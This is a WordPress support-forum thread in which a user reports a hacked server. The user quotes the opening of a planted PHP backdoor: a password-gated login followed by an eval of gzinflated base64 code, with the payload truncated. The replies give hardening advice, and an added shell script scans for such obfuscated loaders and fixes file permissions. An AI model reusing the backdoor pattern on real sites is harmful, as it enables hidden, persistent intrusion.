WP 2.6 is hackable, hacked?

  • I just updated to wordpress 2.6 about a week ago.

    Someone easily got onto my server and added a bunch of encoded code that adds extra pages to my main site, and made exploits on other sites on my server as well that don’t even have wordpress installed. They started the hack in a file in the “wp-admin” folder called “edit-page-set.php” – it was 45kb.

    Here’s a sample of the code:

    <?php
    session_start();
    if(md5($_POST[pass])=='4ca83123fc97ebb33540d9ccda571335')
    {$_SESSION[logged]=1;}
    if(!$_SESSION[logged])
    {
    print "<div style='position:absolute;left:40%;top:50%;'><form method=post><input name=pass><input type=submit value=login></form></div>";
    exit;}
    eval(gzinflate(base64_decode('FJ3HcqPsFkUf53YVA3IakoPIGSa3yCByDk//y5Me..........

    There’s several hundred lines of encoding after the above code.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Just because that is the file changed does not mean WordPress was hacked. It is way more likely they got in some other way, then did their dirty work. In any case, inform your host immediately if you are on a shared server so others will not be at risk, also.
    Look through your logs for a clue as to where they got into the server.

  • Blaming the product to start with is too easy. Making it hard to hack a site starts with your own precautions. It seems to me you did NOT take any.

    If your site is hacked (no matter where your site is hosted and how it’s ‘hacked’), you should first check what _you_ should have done to prevent overwriting your files: set the right protection on your directories and files.
    In general, all directories containing WordPress code and data, as well as the code itself, should be marked READONLY for World; just allow WRITE access to the owner (yourself). Add Write access to the upload directories only, limited, if possible, to the group the webserver belongs to. Your webserver should be running in a non-privileged environment whenever possible – in some environments it’s easier than in others.

    Another rule-of-thumb: NEVER use default locations. Although WordPress installs in a /wordpress/ directory, there is no need at all to stick to that name, and changing it to (for instance) /wp26/ (and changing the mapping in your webserver accordingly) will do no harm at all. It offers more facilities as well.
    Mark the directories non-browsable by a web browser. Especially the one containing wp-config.php: it contains very sensitive data to access your database (I moved this to a separate file that is then included into wp-config.php; the location is not mapped in the webserver, and is not accessible by anyone but me (RW) or the webserver (R)).

    Some of these precautions are easy on any system, others are easy on mine, but probably troublesome on others.
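As an added example (not code from the thread or from WordPress), the script below turns the two points above into checks a site owner can run against a WordPress document root: a scan for PHP files carrying the eval(decoder(base64_decode( loader chain quoted in the first post, and an audit plus fix for the file-permission policy the reply describes (world read-only, owner writable, uploads writable by the webserver group only). The function names and the wp-content/uploads default are this example's assumptions.

```shell
#!/bin/sh
# Added example, not part of the original thread. Run as: ./wp-triage.sh /path/to/wp [uploads-dir]
# scan_obfuscated_php  lists PHP files containing the eval(<decoder>(base64_decode( loader
# audit_writable       lists entries writable by group or world outside the uploads tree
# harden_perms         applies owner-rw / world-ro, with group write only under uploads

scan_obfuscated_php() {
    # grep -l prints only the file name; the pattern covers the common decoder wrappers
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'eval\((gzinflate|gzuncompress|str_rot13)\(base64_decode\(' {} + \
        2>/dev/null || :
}

audit_writable() {
    root="$1"; uploads="${2:-$1/wp-content/uploads}"   # default upload dir is an assumption
    # -perm -002: writable by others; -perm -020: writable by group.
    # The uploads tree is pruned because the webserver group legitimately writes there.
    find "$root" -path "$uploads" -prune -o \
        \( -perm -002 -o -perm -020 \) -print 2>/dev/null || :
}

harden_perms() {
    root="$1"; uploads="$2"; webgroup="$3"
    find "$root" -type d -exec chmod 755 {} +   # rwxr-xr-x: world may traverse, never write
    find "$root" -type f -exec chmod 644 {} +   # rw-r--r--
    if [ -f "$root/wp-config.php" ]; then
        chmod 600 "$root/wp-config.php"         # database credentials: owner only
    fi
    if [ -d "$uploads" ]; then
        chgrp -R "$webgroup" "$uploads"
        find "$uploads" -type d -exec chmod 775 {} +   # group (webserver) may write here
        find "$uploads" -type f -exec chmod 664 {} +
    fi
}

# Stand-alone use: report only; call harden_perms explicitly once the report looks right.
if [ -n "${1:-}" ]; then
    echo "== PHP files with an obfuscated loader =="; scan_obfuscated_php "$1"
    echo "== group/world-writable entries outside uploads =="; audit_writable "$1" "${2:-}"
fi
```

The scan is a quick indicator, not a verdict: a matching file still has to be compared against a clean copy of the same WordPress release, and the access logs checked for how it got there.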

  • Since 2.6 you can put the wp-config.php file in a directory ABOVE your WP install and WP will know to look for it without you doing anything. Read the instructions in the config file in 2.6.
